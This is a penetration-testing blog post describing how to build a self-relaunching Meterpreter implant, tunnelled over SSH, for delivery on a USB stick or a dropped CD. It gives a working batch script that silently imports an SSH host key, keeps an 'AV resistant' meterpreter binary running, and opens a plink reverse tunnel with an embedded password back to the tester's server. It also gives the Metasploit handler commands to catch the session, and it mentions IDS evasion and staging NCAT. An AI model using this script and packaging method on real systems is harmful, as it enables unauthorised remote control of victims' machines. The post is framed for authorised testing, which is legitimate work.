
Resilient SSH Tunneled Meterpreter Session

By Mark Baggett

this post I’ll show you how to make a resilient meterpreter session
that is tunneled over SSH back to your penetration testing machine.
Resilient in that it will monitor the tools running needed to
give me access and relaunch them if needed. This is NOT the same as a
persistent backdoor that survives a reboot and is typically not part
of a penetration test. But it is resilient, so if I kill the
processes accidentally, they will relaunch themselves. This also isn’t stealth although it could be made to be. It is visible to the end user.

lets get a few things out of they way. WHY tunnel Meterpreter over
SSH? My intention is not to avoid IDS, but it will help achieve that.
Meterpreter avoids IDS just fine on its own although I think it may
still be possible to detect meterpreter before it is fully loaded and
secured with TLS.   But, if your trying to avoid IDS then tunneling over SSH isn’t likely to hurt. Using SSH also allows me to add some authentication back to
my host rather than just firewall rules on my Meterpreter console. Because
I’m loading my servers SSH key on the client I am authenticating that
the client is connecting to MY server. Of course this is easily
manually bypassed, but my automated script will not connect if the
server key does not match. Therefore I can say with confidence that
the CD I leave in the parking lot will only connect that client back
to my machine based. I’ve also verified that the meterpreter session
coming in knows my ssh servers username and password.

advantage (that is not without risk) is that this configuration will
allow you to do some name resolution for your tunnel. So if my
pen-test machine is on an EVDO or other dynamic IP and it changes I
can just update the DNS record and not the client tool. That is kind
of nice.

small talk, lets build a package containing a resilient meterpreter client that we can send into penetration testing clients environment on a USB or CDROM.

I create an “AV resistant” copy of meterpreter as described here. 

I get a copy of PLINK.EXE which is part of the putty project here 

connect to your SSH server once and export the registry key
HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSshHostKeys. These are
the keys you will need to import on the client so that PLINK can
connect to your server without the SSH Fingerprint prompt.  In this case I exported that key and called it “storedSSHkey.reg”

I create a .BAT or .CMD file with the following commands in it.


regedit /s storedSSHkey.reg
for /L %%i in (1,0,2) do (wmic process WHERE name="metbind9999.exe" get name  | find "metbind9999" && echo "meterpreter is running" || start metbind9999.exe) & ( wmic process WHERE name="plink.exe" get name  | find "plink" && echo "plink running" || (start plink -R 9999: -pw sshpass [email protected])) & ping -n 5

command script will first IMPORT the SSH key of our server into
the registry of the clients machine so that when PLINK runs to
connect back to our testing machine the SSH Fingerprint has already
been accepted and the script will not pause indefinitely. In doing
so, the client has validated the server its sending the shell to.

we start our FOR loop which resiliently relaunches the meterpreter
process and the PLINK process if they die for some reason.

is really all you need, but since we are going to build all the pieces anyway I like to
include some other tools that I want to stage on the clients
machine such as NCAT and a few others. Make sure your
penetration testing agreement permits the installation of such tools.

I package all those tools up together along with the PROCMON.CMD file using iexpress.   (be sure to enable long name support or you’ll need to rename all the files in the package to 8.3 format) The the package is ready to send to a penetration testing client.   Here is a video demonstrating the
creation of the package and some process resiliency testing.

Persistent SSH tunneled Meterpreter from PaulDotCom on Vimeo.

the client has opened the package you will have a connection waiting
for you on the port you have designated on your SSH server. In the
example above it is listening on port 9999 on my SSH server. Then you
can use the multi/handler to connect and use it.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST
msf exploit(handler) > set LPORT 9999
LPORT => 9999
msf exploit(handler) > exploit

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

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